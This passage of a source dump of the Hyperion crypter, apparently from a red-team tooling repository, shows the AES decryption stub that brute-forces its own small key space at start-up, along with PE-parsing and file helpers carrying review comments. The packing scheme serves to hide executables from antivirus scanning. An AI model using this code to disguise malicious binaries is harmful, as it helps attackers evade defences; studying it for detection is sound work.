;here: sets eax to 1, both parameters unused
macro writeLog apitable, content{
        mov eax,1
}

;delete old log file and create a new one
;here: sets eax to 1, apitable unused
macro initLogFile apitable{
        mov eax,1
}

;write a newline into logfile
;here: sets eax to 1, apitable unused
macro writeNewLineToLog apitable{
        mov eax,1
}

;write a register value into logfile
;here: sets eax to 1, both parameters unused
macro writeRegisterToLog apitable, value{
        mov eax,1
}
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/decryption_payload.asm:
--------------------------------------------------------------------------------
1 | include '..\..\Payloads\Aes\64\aes.inc'
2 | include '..\..\Payloads\Aes\64\aes.asm'
3 | include '..\..\Payloads\Aes\64\decryptexecutable.asm'
4 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/image_base.inc:
--------------------------------------------------------------------------------
1 | IMAGE_BASE equ 0x400000
2 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/image_size.inc:
--------------------------------------------------------------------------------
1 | IMAGE_SIZE equ 0x52000
2 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/infile_size.inc:
--------------------------------------------------------------------------------
1 | INFILE_SIZE equ 0x28e10
2 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/key_size.inc:
--------------------------------------------------------------------------------
;Bounds of the key search performed by the payload at start-up.
;As used by nextKey in the 32-bit payload on this page: only the first
;REAL_KEY_SIZE key bytes ever change and each takes the values
;0 .. REAL_KEY_RANGE-1, giving REAL_KEY_RANGE^REAL_KEY_SIZE candidates
;(4^6 = 4096 with the values below). The 64-bit nextKey presumably uses the
;constants the same way - confirm.
;For analysis this means the key adds no secrecy: anyone holding the packed
;file can repeat the same search offline.
REAL_KEY_SIZE equ 0x6
REAL_KEY_RANGE equ 0x4
3 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/logfile_disable.asm:
--------------------------------------------------------------------------------
;Logging disabled (64-bit container): every macro in this file has an empty
;body, apart from writeWithNewLine which only forwards to the macro named by
;its first argument. Call sites can stay unchanged while no log strings and
;no log-file code are assembled into the output.

;createString* macros: one per log message, all empty here. The location
;parameter is unused.
macro createStringBruteforcing location
{

}

macro createStringSettingPermissions location
{

}

macro createStringOrdinal location
{

}

macro createStringName location
{

}

macro createStringProcessImportDirectory location
{

}

macro createStringFoundImportTable location
{

}

macro createStringLoadingFilesAPIs location
{

}

macro createStringMappingFileInMemory location
{

}

macro createStringLoaded location
{

}

macro createStringLoadedPEHeader location
{

}

macro createStringVerifyPE location
{

}

macro createStringVerifyChecksum location
{

}

macro createStringDone location
{

}

macro createStringError location
{

}

macro createStringStartingHyperion location
{

}

macro createStringStartingHyperionLines location
{

}

macro createStringLogTxt location
{

}

;writes a string and a newline to the logfile
;here: only invokes char_sequence on char_buffer (itself an empty macro when
;it is one of the createString* macros above); error_exit is unused
macro writeWithNewLine char_sequence, char_buffer, error_exit{
        char_sequence char_buffer

}

;write a string to the logfile (empty here)
macro writeLog content, exit_error{

}

;delete old log file and create a new one (empty here)
macro initLogFile exit_error{

}

;write a newline into logfile (empty here)
macro writeNewLineToLog exit_error{

}

;write a register value into logfile (empty here)
macro writeRegisterToLog value, exit_error{

}

;no description in the original; empty here
macro writeSectionNameAndAddressToLog{

}
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/logfile_select.asm:
--------------------------------------------------------------------------------
1 | include 'logfile_disable.asm'
2 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/main_prolog.inc:
--------------------------------------------------------------------------------
1 | format PE64 GUI 5.0 at IMAGE_BASE
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/aes.c:
--------------------------------------------------------------------------------
1 | #include "hyperion.h"
2 | #include "fasmoutput.h"
3 |
4 | //include '..\..\Payloads\Aes\32\aes.inc'
5 | //include '..\..\Payloads\Aes\32\aes.asm'
6 | //include '..\..\Payloads\Aes\32\decryptexecutable.asm'
7 |
/*
 * Registers the AES payload sources with the container build.
 *
 * pe32 selects the 32-bit payload and container directories when non-zero,
 * the 64-bit ones otherwise. Three paths are built by appending
 * AES_INC_FILENAME, AES_ASM_FILENAME and AES_DECRYPTION_FILENAME to the
 * payload directory; each is passed to fasmInclude() together with
 * DECRYPTION_PAYLOAD_FILENAME in the container directory. The first call
 * passes FALSE and the two later ones TRUE as last argument (presumably
 * "append to the file" - confirm against fasmInclude).
 *
 * Returns TRUE when all three calls succeed; stops and returns FALSE at the
 * first failing call.
 *
 * NOTE(review): the strlcat() used here truncates silently, so a directory
 * plus file name longer than MAX_CHAR_SIZE - 1 is shortened and still handed
 * to fasmInclude().
 */
BOOL decryptAES(BOOL pe32){
    //select destination paths
    const char* payload_directory = pe32 ? PAYLOAD32_AES_DIR : PAYLOAD64_AES_DIR;
    const char* container_directory = pe32 ? CONTAINER32_DIR : CONTAINER64_DIR;

    //create file names, each one starting from an empty string
    char aes_inc[MAX_CHAR_SIZE] = "";
    char aes_asm[MAX_CHAR_SIZE] = "";
    char decrypter_asm[MAX_CHAR_SIZE] = "";

    strlcat(aes_inc, payload_directory, MAX_CHAR_SIZE);
    strlcat(aes_inc, AES_INC_FILENAME, MAX_CHAR_SIZE);

    strlcat(aes_asm, payload_directory, MAX_CHAR_SIZE);
    strlcat(aes_asm, AES_ASM_FILENAME, MAX_CHAR_SIZE);

    strlcat(decrypter_asm, payload_directory, MAX_CHAR_SIZE);
    strlcat(decrypter_asm, AES_DECRYPTION_FILENAME, MAX_CHAR_SIZE);

    //create include file to use aes algorithm; && short-circuits, so a
    //failing call prevents the later ones exactly like an early return
    if(fasmInclude(container_directory, DECRYPTION_PAYLOAD_FILENAME, aes_inc, FALSE)
       && fasmInclude(container_directory, DECRYPTION_PAYLOAD_FILENAME, aes_asm, TRUE)
       && fasmInclude(container_directory, DECRYPTION_PAYLOAD_FILENAME, decrypter_asm, TRUE))
    {
        return TRUE;
    }
    return FALSE;
}
54 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/aes.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/aes.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/encryption.c:
--------------------------------------------------------------------------------
1 | #include "hyperion.h"
2 |
3 | #define CBC 0
4 | #define CTR 0
5 | #define ECB 1
6 | #include
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | /**
13 | * Create a simple checksum from a file which adds each of its bytes
14 | */
15 | uint32_t getChecksum(unsigned char* data, unsigned int size){
16 | uint32_t ret = 0;
17 | for(unsigned int i=0; i
4 | #include
5 |
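/*
 * Reads the whole of file_name into a freshly malloc()ed buffer.
 *
 * On success the buffer and its length are stored in open_file->file and
 * open_file->size and TRUE is returned; the caller owns the buffer.
 * On any failure a message goes to stderr, the stream and the buffer are
 * released, *open_file is left untouched and FALSE is returned.
 */
BOOL fileToMem(const char* file_name, struct OpenFile* open_file){
    //open input file
    verbose("Opening %s\n", file_name);

    FILE* f1 = fopen(file_name,"rb");
    if(f1 == NULL) {
        fprintf(stderr, "Could not open %s\n", file_name);
        return FALSE;
    }

    /* obtain file size; fseek/ftell fail on streams that cannot be sized */
    long end_pos = -1;
    if(fseek(f1, 0, SEEK_END) == 0) {
        end_pos = ftell(f1);
    }
    /* the size is carried as an int below, so reject what does not fit
       instead of passing a negative or wrapped value to malloc/fread */
    int f1_size = (int) end_pos;
    if(end_pos < 0 || (long) f1_size != end_pos) {
        fprintf(stderr, "Could not determine size of %s\n", file_name);
        fclose(f1);
        return FALSE;
    }
    rewind(f1);

    /* copy file to memory */
    unsigned char* file1 = (unsigned char*) malloc((size_t) f1_size);
    if(file1 == NULL) {
        fprintf(stderr, "Could not allocate memory for input file size %d\n", f1_size);
        fclose(f1);     /* was leaked on this path */
        return FALSE;
    }
    size_t read_bytes = fread((void*) file1, 1, (size_t) f1_size, f1);
    if(read_bytes != (size_t) f1_size) {
        /* size_t has no portable %d form; print it as unsigned long */
        fprintf(stderr, "Could not copy input file into memory: %lu %d\n",
                (unsigned long) read_bytes, f1_size);
        free(file1);    /* was leaked on this path */
        fclose(f1);
        return FALSE;
    }

    /* close input files */
    fclose(f1);

    //file opened successfully
    open_file->file = file1;
    open_file->size = f1_size;
    /* %p prints the full pointer; %x dropped the upper half on 64-bit builds */
    verbose("Successfully copied file to memory location: %p\n",
            (void*) open_file->file);
    return TRUE;
}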
45 |
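/*
 * Writes size bytes from content to file_name.
 *
 * append == FALSE truncates/creates the file ("wb"), anything else appends
 * to it ("ab"). Returns TRUE only when every byte was written and the stream
 * closed without error; otherwise prints a message to stderr and returns
 * FALSE.
 */
BOOL memToFile(const char* file_name, char* content, unsigned long size,
               BOOL append){
    FILE* f1 = fopen(file_name, append ? "ab" : "wb");
    if(f1 == NULL) {
        fprintf(stderr, "Could not open %s\n", file_name);
        return FALSE;
    }

    size_t bytes_written = fwrite(content, sizeof(char), size, f1);
    if(bytes_written != size) {
        fclose(f1);
        /* neither value is an int; %d was a format mismatch */
        fprintf(stderr, "Could not copy memory to output file: %lu %lu\n",
                (unsigned long) bytes_written, size);
        return FALSE;
    }

    /* data may still sit in the stdio buffer until the stream is closed, so
       a failing fclose() means the output file is incomplete */
    if(fclose(f1) != 0) {
        fprintf(stderr, "Could not close %s\n", file_name);
        return FALSE;
    }
    return TRUE;
}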
73 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/fileaccess.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/fileaccess.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/hyperion.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/hyperion.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/pe32.c:
--------------------------------------------------------------------------------
1 | #include "hyperion.h"
2 |
/**
 * Returns the address directly behind the CoffHeader, typed as the 32-bit
 * OptionalStandardHeader.
 *
 * Pure pointer arithmetic: nothing here checks that the result still lies
 * inside the buffer holding the file, so callers parsing untrusted input
 * have to bound-check before dereferencing it.
 */
struct OptionalStandardHeader32* getOSH32(struct CoffHeader* coff_ptr){
    char* after_coff = (char*) coff_ptr + sizeof(struct CoffHeader);
    return (struct OptionalStandardHeader32*) after_coff;
}
12 |
/**
 * Returns the address directly behind the 32-bit OptionalStandardHeader,
 * typed as the OptionalWindowsHeader.
 *
 * No bounds are checked; the caller must make sure the header fits in the
 * buffer before using the result.
 */
struct OptionalWindowsHeader32* getOWH32(struct OptionalStandardHeader32* os_ptr){
    char* after_standard = (char*) os_ptr + sizeof(struct OptionalStandardHeader32);
    return (struct OptionalWindowsHeader32*) after_standard;
}
20 |
/*
 * Retrieves the DataDirectory list: the address directly behind the 32-bit
 * OptionalWindowsHeader.
 *
 * No bounds are checked and the number of directory entries is not looked
 * at here; the caller has to validate both against the buffer size.
 */
struct ImageDataDirectory* getIDD32(struct OptionalWindowsHeader32* owh_ptr){
    char* after_windows = (char*) owh_ptr + sizeof(struct OptionalWindowsHeader32);
    return (struct ImageDataDirectory*) after_windows;
}
30 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/pe32.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/pe32.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/pe64.c:
--------------------------------------------------------------------------------
1 | #include "hyperion.h"
2 |
/**
 * Returns the address directly behind the CoffHeader, typed as the 64-bit
 * OptionalStandardHeader.
 *
 * Pure pointer arithmetic: nothing here checks that the result still lies
 * inside the buffer holding the file, so callers parsing untrusted input
 * have to bound-check before dereferencing it.
 */
struct OptionalStandardHeader64* getOSH64(struct CoffHeader* coff_ptr){
    char* after_coff = (char*) coff_ptr + sizeof(struct CoffHeader);
    return (struct OptionalStandardHeader64*) after_coff;
}
12 |
/**
 * Returns the address directly behind the 64-bit OptionalStandardHeader,
 * typed as the OptionalWindowsHeader.
 *
 * No bounds are checked; the caller must make sure the header fits in the
 * buffer before using the result.
 */
struct OptionalWindowsHeader64* getOWH64(struct OptionalStandardHeader64* os_ptr){
    char* after_standard = (char*) os_ptr + sizeof(struct OptionalStandardHeader64);
    return (struct OptionalWindowsHeader64*) after_standard;
}
20 |
/*
 * Retrieves the DataDirectory list: the address directly behind the 64-bit
 * OptionalWindowsHeader.
 *
 * No bounds are checked and the number of directory entries is not looked
 * at here; the caller has to validate both against the buffer size.
 */
struct ImageDataDirectory* getIDD64(struct OptionalWindowsHeader64* owh_ptr){
    char* after_windows = (char*) owh_ptr + sizeof(struct OptionalWindowsHeader64);
    return (struct ImageDataDirectory*) after_windows;
}
30 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/pe64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/pe64.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/pe_general.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/pe_general.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/secure_string.c:
--------------------------------------------------------------------------------
1 | /*
2 | * Code from http://stackoverflow.com/users/2193455/kangear
3 | */
4 | #ifndef HAVE_STRLCAT
5 |
6 | #include
7 | #include
8 | #include
9 |
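/*
 * 'strlcat()' - Safely concatenate two strings.
 *
 * Appends as much of src as fits into the size-byte buffer dst and always
 * leaves dst NUL-terminated when it writes. The return value is the
 * resulting (possibly truncated) length of dst, so unlike the BSD function
 * it cannot be used to detect truncation.
 *
 * If dst holds no terminator within its first size bytes (this includes
 * size == 0) nothing is written and size is returned. The earlier code
 * computed "size - (dstlen + 1)" without that check; the unsigned result
 * wrapped around and the copy ran past the end of the buffer.
 */

size_t                  /* O - Length of string */
strlcat(char       *dst,        /* O - Destination string */
        const char *src,        /* I - Source string */
        size_t     size)        /* I - Size of destination string buffer */
{
  size_t      srclen;           /* Length of source string */
  size_t      dstlen;           /* Length of destination string */
  const char  *dstend;          /* Terminator of destination string */


 /*
  * Figure out how much room is left; the scan never looks beyond the
  * size bytes the caller vouched for...
  */

  dstend = (const char *)memchr(dst, '\0', size);

  if (!dstend)
    return (size);              /* Not terminated inside the buffer */

  dstlen = (size_t)(dstend - dst);
  size   -= dstlen + 1;         /* Cannot wrap: dstlen < size */

  if (!size)
    return (dstlen);            /* No room, return immediately... */

 /*
  * Figure out how much room is needed...
  */

  srclen = strlen(src);

 /*
  * Copy the appropriate amount...
  */

  if (srclen > size)
    srclen = size;

  memcpy(dst + dstlen, src, srclen);
  dst[dstlen + srclen] = '\0';

  return (dstlen + srclen);
}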
51 | #endif /* !HAVE_STRLCAT */
52 |
53 | #ifndef HAVE_STRLCPY
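/*
 * 'strlcpy()' - Safely copy a string.
 *
 * Copies at most size - 1 bytes of src into dst and NUL-terminates the
 * result. The return value is the number of bytes copied (the possibly
 * truncated length), so unlike the BSD function it cannot be used to
 * detect truncation.
 *
 * With size == 0 nothing is written and 0 is returned. The earlier code
 * decremented size unconditionally; for 0 the unsigned value wrapped
 * around and the whole of src was copied regardless of the buffer.
 */

size_t                  /* O - Length of string */
strlcpy(char       *dst,        /* O - Destination string */
        const char *src,        /* I - Source string */
        size_t     size)        /* I - Size of destination string buffer */
{
  size_t      srclen;           /* Length of source string */


  if (size == 0)
    return (0);                 /* No room, not even for the terminator */

 /*
  * Figure out how much room is needed...
  */

  size--;

  srclen = strlen(src);

 /*
  * Copy the appropriate amount...
  */

  if (srclen > size)
    srclen = size;

  memcpy(dst, src, srclen);
  dst[srclen] = '\0';

  return (srclen);
}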
86 | #endif /* !HAVE_STRLCPY */
87 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/secure_string.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/secure_string.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/verbose.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | #include "hyperion.h"
5 |
6 | BOOL display_verbose = FALSE;
7 |
/*
 * printf-style diagnostic output. Prints to stdout only while the global
 * display_verbose flag is set; otherwise the call does nothing.
 *
 * format is handed to vprintf() as the format string, so callers must pass
 * a constant format and keep externally supplied text in the arguments.
 */
void verbose(const char *format, ...)
{
  if (display_verbose) {
    va_list ap;

    va_start(ap, format);
    vprintf(format, ap);
    va_end(ap);
  }
}
18 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/verbose.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/verbose.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/32/aes.inc:
--------------------------------------------------------------------------------
;select the AES key size: leave exactly one of the three lines active.
;aes_constants_intern.inc derives KEY_SIZE, EXTENDED_KEY_SIZE, ROW_SIZE and
;ENCRYPTION_ROUNDS from whichever symbol is defined.
AES128 equ 1
;AES192 equ 1
;AES256 equ 1

;internal constants, don't change them
include 'aes_constants_intern.inc'
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/32/aes_constants_intern.inc:
--------------------------------------------------------------------------------
;static for AES, independent of the key size (sizes in bytes)
BLOCK_SIZE equ 16
COLUMN_SIZE equ 4

;Per-key-size parameters. Each block below applies when its selector symbol
;is defined. In every block EXTENDED_KEY_SIZE equals
;(ENCRYPTION_ROUNDS + 1) * BLOCK_SIZE and ROW_SIZE equals KEY_SIZE / 4.
;NOTE(review): with no selector defined none of the four names is set here;
;with several defined the last matching block presumably wins - confirm.
if defined AES128
        KEY_SIZE = 16
        EXTENDED_KEY_SIZE = 176
        ROW_SIZE = 4
        ENCRYPTION_ROUNDS = 10
end if

if defined AES192
        KEY_SIZE = 24
        EXTENDED_KEY_SIZE = 208
        ROW_SIZE = 6
        ENCRYPTION_ROUNDS = 12
end if

if defined AES256
        KEY_SIZE = 32
        EXTENDED_KEY_SIZE = 240
        ROW_SIZE = 8
        ENCRYPTION_ROUNDS = 14
end if

;size of the sbox
SBOX_SIZE equ 256

;size of the rcon table
RCON_SIZE equ 256

;size of the Galois multiplication
;lookup tables
GALOIS_SIZE equ 256
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/32/decryptexecutable.asm:
--------------------------------------------------------------------------------
;Decrypt the exe which is stored in input_image
;
;No key is passed in: the search starts from an all-zero key and asks
;nextKey for the next candidate until verifyChecksum accepts the decrypted
;image. The number of candidates is bounded by REAL_KEY_SIZE and
;REAL_KEY_RANGE (see nextKey), so the same search can be repeated offline by
;anyone analysing a packed file.
;
;Inputs : APITable    - table of API pointers; VirtualAlloc and VirtualFree
;                       are fetched from it by offset
;         input_image - INFILE_SIZE bytes, decrypted in place
;Returns: eax = 1 on success; eax = 0 when the allocation fails, when every
;         candidate key was rejected, or when VirtualFree fails.
;         All other general registers are preserved (pushad/popad).
;NOTE(review): on the two failure paths after the allocation the backup
;buffer is not released.
proc decryptExecutable stdcall APITable:DWORD, input_image:DWORD

        local str1[256]:BYTE, ret_val:DWORD,\
              key[KEY_SIZE]:BYTE, encrypted_backup:DWORD

        pushad
        ;log hook; the macro's third parameter is named error_exit, yet the
        ;success label is passed here - NOTE(review): confirm this is intended
        writeWithNewLine createStringBruteforcing, str1, dec_exit_success

        ;init key: set all KEY_SIZE bytes to zero
        lea edi,[key]
        mov ecx, KEY_SIZE
        mov al,0
dec_init_key:
        mov [edi],al
        inc edi
        dec ecx
        jnz dec_init_key

        ;create a copy of the encrypted file
        ;which is used to brute force the key
        mov eax,[APITable]
        stdcall dword [eax+VirtualAlloc], 0, INFILE_SIZE, MEM_COMMIT+MEM_RESERVE, PAGE_READWRITE
        test eax, eax
        jz dec_exit_error
        mov [encrypted_backup],eax
        ;now copy the file into the buffer
        mov edi,eax
        mov esi,[input_image]
        mov ecx,INFILE_SIZE
        ;we can mov dwords because buffer is a multiple of 16
        shr ecx,2
        repz movsd

keyspace_loop:
        ;decrypt in place with the current candidate (source and destination
        ;are both input_image), then let verifyChecksum judge the result;
        ;a non-zero eax means the candidate was accepted
        lea eax,[key]
        stdcall decAES, INFILE_SIZE, [input_image], [input_image], eax
        stdcall verifyChecksum, [input_image], INFILE_SIZE
        test eax,eax
        jnz dec_decrypted_success

        ;restore the encrypted version to try the next key
        mov esi,[encrypted_backup]
        mov edi,[input_image]
        mov ecx,INFILE_SIZE
        shr ecx,2
        repz movsd
        ;lea eax,[key]
        ;stdcall encAES, [section_size], [section_address], [section_address], eax

        ;next key
        lea eax,[key]
        stdcall nextKey, eax
        test eax,eax
        ;nextKey returned 0: every candidate was tried; input_image holds the
        ;restored encrypted data at this point
        jz dec_exit_error
        ;abort if key space was explored, else continue
        jmp keyspace_loop

dec_decrypted_success:
        ;release the backup copy; a failing VirtualFree is reported as error
        ;although input_image is already decrypted
        mov eax,[APITable]
        stdcall dword [eax+VirtualFree], [encrypted_backup], 0, MEM_RELEASE
        test eax, eax
        jz dec_exit_error

dec_exit_success:
        popad
        mov eax,1
        ret

dec_exit_error:
        popad
        sub eax,eax
        ret

endp
76 |
;generate next decryption key
;
;Treats the first REAL_KEY_SIZE bytes at key_ptr as a counter with one digit
;per byte, lowest digit first, each digit running from 0 to REAL_KEY_RANGE-1.
;The counter is incremented by one; bytes beyond REAL_KEY_SIZE are never
;touched.
;Returns: eax = 1 when a new candidate was produced,
;         eax = 0 when the counter overflowed (all digits are back at 0,
;         i.e. every candidate has been handed out). ebx is preserved.
proc nextKey stdcall key_ptr:DWORD

        push ebx
        mov eax,[key_ptr]
        mov ebx,eax
        add ebx,REAL_KEY_SIZE           ;ebx = one past the last counter byte
nkey_next_element:
        inc byte [eax]
        cmp byte [eax],REAL_KEY_RANGE
        jne nkey_not_finished           ;digit still in range: done
        mov byte [eax],0                ;digit overflowed: reset and carry
        inc eax
        cmp eax,ebx
        je nkey_finished                ;carry out of the last digit
        jmp nkey_next_element

nkey_not_finished:
        pop ebx
        mov eax,1
        ret

nkey_finished:
        pop ebx
        sub eax,eax
        ret

endp;
105 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/32/license.txt:
--------------------------------------------------------------------------------
1 | Copyright (c) 2019, FasmAES by Christian Ammann
2 | All rights reserved.
3 |
4 | Redistribution and use in source and binary forms, with or without
5 | modification, are permitted provided that the following conditions are met:
6 |
7 | 1. Redistributions of source code must retain the above copyright notice, this
8 | list of conditions and the following disclaimer.
9 | 2. Redistributions in binary form must reproduce the above copyright notice,
10 | this list of conditions and the following disclaimer in the documentation
11 | and/or other materials provided with the distribution.
12 |
13 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
14 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
15 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
16 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
17 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
18 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
19 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
20 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
21 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
22 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
23 |
24 | The views and conclusions contained in the software and documentation are those
25 | of the authors and should not be interpreted as representing official policies,
26 | either expressed or implied, of the Nullsecurity Project.
27 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/32/rcon.asm:
--------------------------------------------------------------------------------
;For every value in the list: store it as one byte at [target], then advance
;target by one. target is a register holding the write position; after the
;macro it points behind the last byte written.
;Each value becomes its own "mov byte [target], imm" / "inc target" pair, so
;the values end up in the code as instruction immediates rather than as one
;contiguous data table.
macro CreateRcon target, [char]
{
        mov byte [target], char
        inc target
}
6 |
;dynamically generate the rcon in memory
;uses hard coded values, no algorithm
;
;Writes the 256 values listed below (16 rows of 16) to consecutive bytes
;starting at rcon_ptr; the caller has to provide a buffer of at least that
;size (RCON_SIZE in aes_constants_intern.inc is 256). eax is preserved.
proc createRcon rcon_ptr:DWORD
        push eax
        mov eax, [rcon_ptr]
        CreateRcon eax, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,\
                        0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,\
                        0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,\
                        0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,\
                        0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,\
                        0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,\
                        0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,\
                        0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,\
                        0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,\
                        0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,\
                        0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,\
                        0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,\
                        0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,\
                        0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,\
                        0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,\
                        0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d
        pop eax
        ret
endp
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/64/aes.inc:
--------------------------------------------------------------------------------
;select the AES key size: leave exactly one of the three lines active.
;aes_constants_intern.inc derives KEY_SIZE, EXTENDED_KEY_SIZE, ROW_SIZE and
;ENCRYPTION_ROUNDS from whichever symbol is defined.
AES128 equ 1
;AES192 equ 1
;AES256 equ 1

;internal constants, don't change them
include 'aes_constants_intern.inc'
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/64/aes_constants_intern.inc:
--------------------------------------------------------------------------------
;static for AES, independent of the key size (sizes in bytes)
BLOCK_SIZE equ 16
COLUMN_SIZE equ 4

;Per-key-size parameters. Each block below applies when its selector symbol
;is defined. In every block EXTENDED_KEY_SIZE equals
;(ENCRYPTION_ROUNDS + 1) * BLOCK_SIZE and ROW_SIZE equals KEY_SIZE / 4.
;NOTE(review): with no selector defined none of the four names is set here;
;with several defined the last matching block presumably wins - confirm.
if defined AES128
        KEY_SIZE = 16
        EXTENDED_KEY_SIZE = 176
        ROW_SIZE = 4
        ENCRYPTION_ROUNDS = 10
end if

if defined AES192
        KEY_SIZE = 24
        EXTENDED_KEY_SIZE = 208
        ROW_SIZE = 6
        ENCRYPTION_ROUNDS = 12
end if

if defined AES256
        KEY_SIZE = 32
        EXTENDED_KEY_SIZE = 240
